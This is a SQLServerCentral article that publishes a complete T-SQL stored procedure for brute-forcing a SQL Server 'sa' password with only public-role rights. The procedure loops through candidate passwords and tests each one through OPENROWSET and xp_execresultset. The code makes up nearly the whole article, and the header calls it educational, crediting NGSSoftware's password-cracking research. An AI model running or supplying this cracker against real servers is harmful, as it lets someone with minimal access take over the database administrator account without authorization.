Technical Article

Find SA password with public role-perm test DBA

,

Find SA Password (Brute Force) with Public Role


FindSApublic is a brute-force password cracker that requires only public role.

Possibilities  returns how many different passwords are possible with 1 up to c characters from a universe of n different characters.

Usage:

FindSApublic n

N is an integer which is the maximum length of the password to attempt cracking.


Acknowledgments
original idea:
David Litchfield
david@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you David, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/cracking-sql-passwords.pdf

original idea and code:
Chris Anley
chris@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you Chris, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/advanced_sql_injection.pdf


This code is provided as is and for educational purposes only.

Developed, adapted or translated to TSQL by Joseph Gama.

SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS OFF 
GO

CREATE function Possibilities (@c bigint, @n bigint)
--returns how many different passwords are possible with 1 up to c characters from a universe 
--of n different characters 
returns bigint
as
BEGIN
declare @i bigint, @result bigint
set @i=1
set @result=0
while @i<=@c
BEGIN
set @result=@result+power(@n,@i)
set @i=@i+1
END
RETURN @result
END

GO
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS ON 
GO

SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS OFF 
GO

CREATE PROCEDURE FindSApublic (@size int)
 AS
SET NOCOUNT ON
DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50), @dtime datetime, @s VARCHAR(10), @t VARCHAR(10)
SET @dtime=getdate()
SET @keys='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_'
SET @max=test.dbo.Possibilities( @size, LEN(@keys))
SET @n=len(@keys)
SET @s='A'
SET @i=0
create table ##temppwd (pwd  NVARCHAR(10))
WHILE @i<@max
BEGIN
SET @j=@i
WHILE (@j>0)
BEGIN
SET @temp=@j % (@n)-sign(len(@s))
if @temp<0 set @temp=@n-1
SET @j=@j /(@n+sign(len(@s)))
SET @s=substring(@keys,@temp+1,1)+@s
SET @t=@s
END
print @s
declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s)
--set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' FROM OPENDATASOURCE(''''SQLOLEDB'''',''''Data Source='+@@SERVERNAME+N';User ID=sa;Password='+@s1+N''''').master.dbo.sysobjects '''
set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid=sa;pwd='+@s1+N''''',''''select 1 '''')'''
exec master..xp_execresultset  @query,N'master'

if EXISTS(select * from ##temppwd)
GOTO lblFound
SET @s=''
SET @i=@i+1
END
drop table ##temppwd
select 'Not found after '+str(@max)+' rounds, up to '+@t+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
lblFound:
drop table ##temppwd
select 'Found: '+@s+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
GO
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS ON 
GO

Read 11,854 times
(58 in last 30 days)

Rate

You rated this post out of 5. Change rating

Share

Join the discussion and add your comment

Share

Rate

You rated this post out of 5. Change rating

Related content

Cookies on SQLServerCentral

This website stores cookies on your computer.

These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media.

To find out more about the cookies we use, see our Privacy Policy